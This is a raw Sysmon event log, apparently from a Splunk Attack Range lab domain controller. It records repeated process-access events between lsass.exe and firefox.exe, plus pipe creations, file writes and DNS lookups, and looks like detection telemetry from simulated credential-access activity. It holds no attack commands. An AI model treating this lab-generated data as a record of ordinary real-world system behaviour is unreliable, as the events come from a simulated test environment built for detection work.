12:23:00.179{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043695Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.179{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043694Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.179{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043693Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.179{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043692Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.179{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043691Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.179{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043690Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.179{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043689Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.179{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043688Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.179{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043687Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.179{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043686Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.179{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043685Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.179{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043684Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.179{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043683Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.179{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043682Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.179{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043681Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.179{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043680Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.179{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043679Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.179{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 17141700x800000000000000043678Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:23:00.179{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240\chrome.3240.6.128658094C:\Program Files\Mozilla Firefox\firefox.exe 17141700x800000000000000043677Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:23:00.179{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240\chrome.3240.5.175865267C:\Program Files\Mozilla Firefox\firefox.exe 23542300x800000000000000043676Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.079{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0472F974CF75C9354174620124D6C62,SHA256=1E641E4EC76ABFDFE382D923E03B610985C7BB938219D5A81ECDCF32543FDBF1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043675Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.063{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\pending_pings\a5af6b8f-deee-4762-9e54-c8194b8bdd86MD5=94731C7E044844485762A6894D9B117C,SHA256=1A2D7F2D66700F3133D7F29AE1F3C818B8A50787487497723ADCE349487BE334,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043674Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.059{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 22542200x800000000000000043673Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.193{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240prod.balrog.prod.cloudops.mozgcp.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000043672Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.193{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240prod.balrog.prod.cloudops.mozgcp.net035.244.181.201;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000043671Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.187{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240prod.ingestion-edge.prod.dataops.mozgcp.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000043670Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.187{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240prod.ingestion-edge.prod.dataops.mozgcp.net034.120.208.123;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000043669Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.860{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240a1887.dscq.akamai.net02600:141f:4000:9::17ca:5a04;2600:141f:4000:9::17ca:5a0e;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000043668Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.859{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240a1887.dscq.akamai.net023.33.22.139;23.33.22.142;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000043667Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.858{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240r3.o.lencr.org0type: 5 o.lencr.edgesuite.net;type: 5 a1887.dscq.akamai.net;::ffff:23.33.22.142;::ffff:23.33.22.139;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000043666Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.858{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240prod.content-signature-chains.prod.webservices.mozgcp.net02600:1901:0:92a9::;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000043665Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.858{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240prod.content-signature-chains.prod.webservices.mozgcp.net034.160.144.191;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000043664Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.844{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240detectportal.firefox.com0type: 5 detectportal.prod.mozaws.net;type: 5 prod.detectportal.prod.cloudops.mozgcp.net;34.107.221.82;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000043663Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.806{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240example.org0::ffff:93.184.216.34;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000043662Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.805{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240example.org093.184.216.34;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000043661Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.770{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240prod.detectportal.prod.cloudops.mozgcp.net02600:1901:0:38d7::;C:\Program Files\Mozilla Firefox\firefox.exe 